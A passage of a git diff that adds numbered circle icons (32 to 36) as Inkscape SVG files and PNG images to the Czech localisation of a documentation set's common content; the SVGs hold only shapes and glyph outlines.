+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/33.png b/tmp/cs-CZ/xml/Common_Content/images/33.png
new file mode 100644
index 000000000..01407e6bc
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/33.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/33.svg b/tmp/cs-CZ/xml/Common_Content/images/33.svg
new file mode 100644
index 000000000..f46815f7e
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/33.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/34.png b/tmp/cs-CZ/xml/Common_Content/images/34.png
new file mode 100644
index 000000000..ba4435253
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/34.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/34.svg b/tmp/cs-CZ/xml/Common_Content/images/34.svg
new file mode 100644
index 000000000..7bbdf5b9a
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/34.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/35.png b/tmp/cs-CZ/xml/Common_Content/images/35.png
new file mode 100644
index 000000000..21d4575cf
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/35.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/35.svg b/tmp/cs-CZ/xml/Common_Content/images/35.svg
new file mode 100644
index 000000000..8e19553af
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/35.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/36.png b/tmp/cs-CZ/xml/Common_Content/images/36.png
new file mode 100644
index 000000000..b5402b577
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/36.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/36.svg b/tmp/cs-CZ/xml/Common_Content/images/36.svg
new file mode 100644
index 000000000..d364dbf51
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/36.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 